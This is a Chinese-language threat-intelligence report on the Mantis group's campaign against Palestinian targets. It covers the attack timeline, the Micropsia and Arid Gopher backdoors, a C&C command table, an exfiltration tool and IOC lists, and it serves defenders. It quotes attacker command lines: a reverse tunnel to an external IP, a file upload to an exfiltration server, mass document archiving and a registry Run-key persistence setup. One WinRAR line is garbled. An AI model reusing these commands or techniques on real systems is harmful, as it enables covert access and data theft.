背景
Mantis自2014年起活躍,一些第三方報告顯示其可能早在2011年就已經活動。該團體以針對以色列和其他一些中東國家的組織為目標而知名。目標領域包括政府、軍事、金融、媒體、教育、能源和智庫。該團體以使用網路釣魚郵件和假社交媒體個人資料來誘使目標在他們的設備上安裝惡意軟體而知名。
Mantis被廣泛認為與巴勒斯坦領土有聯繫。儘管其他供應商將該團體與哈馬斯聯繫起來,但賽門鐵克無法對任何巴勒斯坦組織做出明確的歸屬。
在其最新的攻擊中,該團體使用了其定制的Micropsia和Arid Gopher後門程式的更新版本來感染目標,隨後進行廣泛的憑證盜竊和竊取資料的外洩。
攻擊鏈
此次活動的初始感染途徑尚不明確。在一個被針對的組織中,攻擊者部署了三個不同版本的相同工具集(即相同工具的不同變體)在三組電腦上。以這種方式隔離攻擊很可能是個預防措施。如果其中一個工具集被發現,攻擊者仍然能夠在目標網路上保持其持久存在。
以下是其中三個工具集之一使用情況的描述:
首次發現惡意活動是在2022年12月18日。執行了三套獨立的混淆PowerShell命令來載入一個Base64編碼的字串,該字串啟動了嵌入的shellcode。 shellcode是一個32位元的引導程序,它使用基本的TCP協定從命令和控制(C&C)伺服器:104.194.222[.]50連接埠4444下載另一個階段。
攻擊者於12月19日返回,先進行憑證轉儲,然後使用Certutil和BITSAdmin下載了Micropsia後門和Putty,一個公開可用的SSH客戶端。
Micropsia隨後執行並開始與C&C伺服器聯繫。同一天,Micropsia也在同一組織的其他三台機器上執行。在每種情況下,它都運行在一個以其檔案名稱命名的資料夾中:
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
在一台電腦上,Micropsia被用來設定一個反向socks隧道到一個外部IP位址:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [已編輯]
12月20日,Micropsia被用來在其中一台受感染的電腦上執行一個名為windowspackages.exe的未知可執行檔。
隔日,12月21日,RAR被執行來在另一台受感染的電腦上歸檔檔案。
從12月22日到2023年1月2日,Micropsia被用來在三台受感染的電腦上執行Arid Gopher後門。 Arid Gopher反過來被用來運行名為SetRegRunKey.exe的工具,它透過在登錄中新增Arid Gopher以實現在重新啟動時執行,從而提供持久性。它也運行了一個名為localsecuritypolicy.exe的未知檔案(攻擊者在其他地方使用這個檔案名稱作為Arid Gopher後門)。
在12月28日,Micropsia被用來在另外三台受感染的電腦上執行windowspackages.exe。
12月31日,Arid Gopher執行了兩個未知檔案名稱為networkswitcherdatamodell.exe和networkuefidiagsbootserver.exe的檔案在兩台受感染的電腦上。
到了1月2日,攻擊者停用了他們正在使用的Arid Gopher版本,並引入了一個新變體。這是因為第一個版本被發現,還是標準作業程序不清楚。
1月4日,Micropsia被用來在單一電腦上執行兩個未知文件,均名為hostupbroker.exe,來自資料夾:csidl_common_appdata\hostupbroker\hostupbroker.exe。這緊接著是RAR檔案的外洩:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
1月9日,Arid Gopher被用來在單一電腦上執行兩個未知檔案:
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe
最後的惡意活動發生在1月12日之後,當Arid Gopher被用來每十小時執行一次未知檔案名稱為localsecuritypolicy.exe。
Micropsia
在這些攻擊中使用的Micropsia後門變體似乎是其他供應商看到的版本的略微更新版本。在這次活動中,Micropsia使用了多個檔案名稱和檔案路徑部署:
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia使用WMI執行,其主要目的似乎是運行攻擊者的二級有效載荷。這些包括:
Arid Gopher(檔案名稱:networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Reverse SOCKs Tunneler(又稱Revsocks)(檔名:windowsservicemanageav.exe)
資料外洩工具(檔名:windowsupserv.exe)
兩個未知文件,均命名為hostupbroker.exe
未知檔名為windowspackages.exe
除此之外,Micropsia具有自己的功能,例如截圖、鍵盤記錄,以及使用WinRAR歸檔某些文件類型以準備資料外洩:
“%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe” ar -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c242196aa00bf59_d01247a1eaf1c241b867541257534020f DATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILETPTP3T.pdf”? “%USERPROFILE%*.odt” “%USERPROFILE% *.mdb” “%USERPROFILE%*.accdb” “%USERPROFILE%*.accde” “%USERPROFILE%*.txt” “%USERPROFILE%*.rtf” “%USERPROFILE%.PROFILE%*.rtf” “%USERPROFILE%*.
Arid Gopher
Arid Gopher與Micropsia不同,後者使用Delphi編寫,Arid Gopher是用Go語言寫的。在此次活動中使用的Arid Gopher版本包含以下嵌入元件:
7za.exe – 一個合法的7-Zip執行檔的副本
AttestationWmiProvider.exe – 一個工具,用於設定「執行」登錄值
ServiceHubIdentityHost.exe – Optimum X的合法Shortcut.exe可執行檔的副本
Setup.env – 設定文件
Arid Gopher也被用來啟動以下未知檔:networkswitcherdatamodell.exe、localsecuritypolicy.exe和networkuefidiagsbootserver.exe,除此之外,它也被用來下載和執行使用PyArmor混淆的檔案。
當與C&C伺服器通訊時,Arid Gopher在一個路徑上註冊設備,然後連接到另一個路徑,可能是為了接收命令:
連線至:http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – 可能為了註冊設備
接著是:http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – 可能為了接收指令
連接至:http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – 可能為了註冊設備
接著是:http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – 可能為了接收指令
Arid Gopher似乎被攻擊者定期更新和重寫,很可能是為了逃避偵測。一種變體的惡意軟體與先前版本的獨特程式碼大不相同,以至於沒有一個子程式包含與前一個版本相同的獨特程式碼。 Mantis似乎在變體之間積極變換邏輯,如果手動完成,這是一個耗時的操作。
| Command | Description |
|---|---|
| “c” | Perhaps related to main.exC(“cmd”) |
| “d” | Perhaps related to main.down2 |
| “s” | Perhaps related to main.OnDSH |
| “ci” | Perhaps related to main.deviceProperties |
| “ps” | Perhaps related to main.exC(“powershell”) |
| “ra” | Perhaps related to main.RunAWithoutW |
| “sf” | Perhaps related to main.updateSettings |
| “sl” | Perhaps related to main.searchForLogs |
| “ua” | Perhaps related to main.updateApp |
| “ut” | Perhaps related to main.updateT |
| “pwnr” | Perhaps related to main.exCWithoutW(“powershell”) |
| “rapp” | Perhaps related to main.restartApp |
| “gelog” | Perhaps related to main.upAppLogs |
| “ufbtt” | Perhaps related to main.collectFi |
| “ufofd” | Perhaps related to main.collectFiOrFol |
| “bwp” | Perhaps related to main.browDat |
| “cbh” | Perhaps related to main.delBD |
| “cwr” | Perhaps related to main.exCWithoutW(“cmd”) |
| “gaf” | Perhaps related to main.collectFi |
| “ntf” | Perhaps related to main.collectNet |
| “smr” | Perhaps related to main.updateSettings |
嵌入的setup.env檔案被一個分析的Arid Gopher變體用來檢索配置數據,包含以下內容:
DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
COMPRESSOR=7za.exe
DDIR=ResourcesFiles
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe
setup.env設定檔提到另一個檔案AttestationWmiProvider.exe,也嵌入在Arid Gopher中。該文件是一個用作助手的32位可執行文件,確保另一個可執行文件在重啟時運行。當它執行時,它會檢查以下命令列參數:
“key” 帶字串參數[RUN_VALUE_NAME]
“value” 帶字串參數[RUN_PATHNAME]
然後它安排接收訊號使用func os/signal.Notify()的通知。一旦收到通知,它會設定以下註冊表值:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”[RUN_VALUE_NAME]” = “[RUN_PATHNAME]”
我們迄今為止的調查顯示,這個檔案設定Arid Gopher在重啟時運行:
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService “-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x”
數據外洩工具
攻擊者也使用了一個客製化的工具來外洩從目標組織竊取的資料:名為WindowsUpServ.exe的64位元PyInstaller可執行檔。運行時,該工具檢查以下命令列參數:
“-d” “[FILE_DIRECTORY]”
“-f” “[FILENAME]”
對於每個”-f” “[FILENAME]”命令列參數,該工具上傳[FILENAME]的內容。對於每個”-d” “[FILE_DIRECTORY]”命令列參數,該工具獲取儲存在資料夾[FILE_DIRECTORY]中的文件列表,並上傳每個文件的內容。
當上傳每個檔案時,工具會向C&C伺服器發送HTTP POST請求,並附有以下參數:
“kjdfnqweb”: [THE_FILE_CONTENT]
“qyiwekq”: [HOSTNAME_OF_THE_AFFECTED_COMPUTER]
每當遠端伺服器以狀態碼200回應時,惡意軟體會從本機磁碟刪除上傳的檔案。惡意軟體也可能在以下文件中記錄其一些行為:
“C:\ProgramData\WindowsUpServ\success.txt”
“C:\ProgramData\WindowsUpServ\err.txt”
堅定的對手
Mantis似乎是一個決心堅定的對手,願意投入時間和精力以最大化其成功機會,這一點從廣泛的惡意軟體重寫和其將針對單一組織的攻擊分割成多個獨立部分以減少整個行動被檢測到的機會可以看出。
IOC指標
| SHA256 hash | File name | Description |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | Arid Gopher |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualizationpicservice.exe | Arid Gopher |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | networkvirtualizationfiaservice.exe | Arid Gopher |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualizationinithservice.exe | Arid Gopher |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | Arid Gopher |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | networkvirtualizationstartservice.exe | Arid Gopher |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | Arid Gopher persistence component |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | windowsupserv.exe | Exfiltration tool |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Exfiltration tool |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Various | Micropsia |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | N/A | Micropsia |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | Micropsia |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | Micropsia |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | networkvirtualizationseoservice.exe | Possible Arid Gopher |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | Possible Meterpreter |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | systempropertiesinternationaltime.exe | Possible Micropsia |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | N/A | Shellcode |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | N/A | Shellcode |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | N/A | Shellcode |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemPropertiesInternationalTime.rar | Unknown file |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Unknown file |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Unknown file |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Unknown file |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Unknown file |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | Unknown file |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embededmodeservice.exe | Unknown file |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe | Unknown file |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embededmodeservice.exe | Unknown file |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe | Unknown file |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | Unknown file |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe | Unknown file |
| jumpstartmail[.]com | Arid Gopher C&C | |
| paydayloansnew[.]com | Arid Gopher C&C | |
| picture-world[.]info | Arid Gopher C&C | |
| rnacgroup[.]com | C&C | |
| salimafia[.]net | Arid Gopher C&C | |
| seomoi[.]net | Arid Gopher C&C | |
| soft-utils[.]com | C&C | |
| chloe-boreman[.]com | Micropsia C&C | |
| criston-cole[.]com | Micropsia C&C | |
| http://5.182.39[.]44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu | Exfiltration tool C&C |
原创文章,作者:首席安全官,如若转载,请注明出处:https://cncso.com/tw/mantis-used-in-attacks-against-palestinian-targets-html
